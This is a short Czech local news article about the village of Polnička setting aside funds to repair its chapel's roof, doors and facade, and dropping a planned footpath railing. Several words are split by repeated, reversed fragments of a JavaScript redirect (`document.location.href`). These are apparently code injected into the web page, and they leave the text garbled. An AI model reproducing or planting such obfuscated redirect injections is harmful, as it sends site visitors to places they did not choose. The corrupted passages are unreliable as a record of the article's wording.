Polnička, polnicka, aktuality, oprava, kaple
Rainbow page separator

Opravu kaple podpoří další peníze

Pondělí, 31. prosince 2012

Polnička / Dalších padesát tisíc korun podpoří záměr opravy kaple v Polničce. Na tu se již nějakou dobu obec snaží získat vhodný dotační či gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový titul, zatím však neúspěšně.Zástupci obce při sestavování rozpočtu na rok 2013 zareagovali na iniciativu místního Klubu seniorů, který na opravu kapličky věnoval deset tisíc korun, a z obecních peněz na nutné úpravy kaple uvolnili dalších padesát tisíc.

Kaplička v Polničce potřebuje novou střešní krytinu, vchodové dveře a rekonstrukci fasády. Mezi obyvateli obce se ve snaze sehnat co nejdříve další finance na stavební úpravy s největší pravděpodobností uskuteční i veřejná sbírka.

Podél svažujícího se chodníku u kapličky však nepřibude zábradlí, o jehož instalaci se uvažovalo, aby byla usnadněna chůze zejména méně pohyblivým lidem v zimních měsících. Kde by [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž bylo v prudkém klesání chodníku zábradlí nejvíce potřeba, jsou místa pro vjezdy z komunikace, které instalaci zábradlí brání. Tam, kde by se zábradlí bez problémů umístit dalo, už zase není [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolik potřebné.